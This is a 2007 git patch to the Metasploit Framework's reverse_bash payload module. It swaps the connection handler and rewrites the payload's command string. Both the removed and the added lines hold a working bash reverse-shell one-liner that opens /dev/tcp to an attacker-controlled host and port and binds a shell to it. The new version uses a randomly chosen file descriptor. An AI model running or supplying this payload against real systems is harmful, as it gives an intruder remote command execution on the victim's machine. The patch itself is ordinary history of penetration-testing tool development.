From ce01a25e0cc0315205e0b1bfd62422892eb45dc8 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 17 Feb 2007 23:41:22 +0000
Subject: [PATCH] This patch fixes #4. Pick a random file descriptor and make
 sure its closed before we use it

git-svn-id: file:///home/svn/framework3/trunk@4407 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/payloads/singles/cmd/unix/reverse_bash.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/modules/payloads/singles/cmd/unix/reverse_bash.rb b/modules/payloads/singles/cmd/unix/reverse_bash.rb
index 9a90b801dd..afba4db41d 100644
--- a/modules/payloads/singles/cmd/unix/reverse_bash.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb
@@ -1,5 +1,5 @@
 require 'msf/core'
-require 'msf/core/handler/reverse_tcp_double'
+require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 
 module Msf
@@ -21,7 +21,7 @@ module ReverseBash
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
 			'Arch'          => ARCH_CMD,
-			'Handler'       => Msf::Handler::ReverseTcpDouble,
+			'Handler'       => Msf::Handler::ReverseTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd_bash',
 			'Payload'       =>
@@ -43,7 +43,8 @@ module ReverseBash
 	# Returns the command string to use for execution
 	#
 	def command_string
-		return "exec 13<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&13 >&13";
+		fd = rand(200) + 20
+		return "0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}";
 	end
 
 end